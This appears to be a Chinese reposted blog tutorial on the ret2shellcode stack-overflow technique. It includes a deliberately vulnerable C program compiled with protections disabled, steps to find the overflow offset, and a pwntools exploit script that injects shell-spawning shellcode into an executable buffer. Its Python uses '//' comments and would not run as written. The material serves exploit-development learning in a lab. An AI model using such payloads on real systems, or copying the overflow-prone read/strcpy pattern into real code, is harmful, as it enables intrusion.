ret2shellcdoe

ret2shellcode的关键是找到一个缓冲区,这个缓冲区是可读写写可执行的,我们要想办法把我们的shellcdoe放到这个缓冲区,然后跳转到我们的shellcode处执行。

例子:

#include <stdio.h>
#include <string.h>
char str1[0x40];

void func()
{
	char str[0x40];
	read(0,str,0x60);
	strcpy(str1,str);
}
int main()
{
	func();
	return 0;
}

可以看出,read处有溢出

编译:

gcc -no-pie -fno-stack-protector -z execstack -m32 -o 6.exe 6.c

找到溢出点:
用peda生成100个字符,
在这里插入图片描述
溢出查看此时的EIP
在这里插入图片描述
溢出点在76
在这里插入图片描述
找到str1首地址
0x804a060
在这里插入图片描述

写出我们的poc

from pwn import *
context(arch="i386",os="linux")
p=process('./6.exe')
offset = 76		
shellcode=asm(shellcraft.sh())		//生成shellcode代码,这里的shellcode越短越好,长度不能超过溢出的长度76
payload =shellcode.ljust(offset,'\x90')+p32(0x804a060)		//ljust是为了让\x90填充我们的shellcode,让其长度达到760x804a060是str1的首地址,目的是为了跳转到str1首地址,去执行我们的shellcode
pid=proc.pidof(p)
print pid
pause()
p.sendline(payload)
p.interactive()

执行,成功获得权限
在这里插入图片描述

注:
生成shellcdoe方法:
方法1.用pwntool或者peda和msfpc或者msfvenom工具生成,支持上线,最好越短越好
例如用pwntool中的shellcraft.sh(),再转汇编字节码asm()
asm(shellcraft.sh()),程序中我们是利用peda生成的。

方法2.手写,其实网上一搜到处都是,可以直接用,但自己要和前段时间windows一样自己调试提取
就是想办法调用evecve("/bin/sh",null,null);

总结
ret2shellcode的本意是我们在程序当中能找到一块缓冲区,这个缓冲区可读可写可执行,然后想各种办法,把我们的shellcode搞进这个缓冲区,然后到这个缓冲区头部去执行。
像上面的例子中,我们利用栈溢出将我们生成的shellcdoe复制到str1处,str1处可读可写可执行,并且在构造payload中加入了这个str1首地址,到这里去执行我们的shellcode

发布了203 篇原创文章 · 获赞 19 · 访问量 2万+

猜你喜欢

转载自blog.csdn.net/qq_41683305/article/details/105163761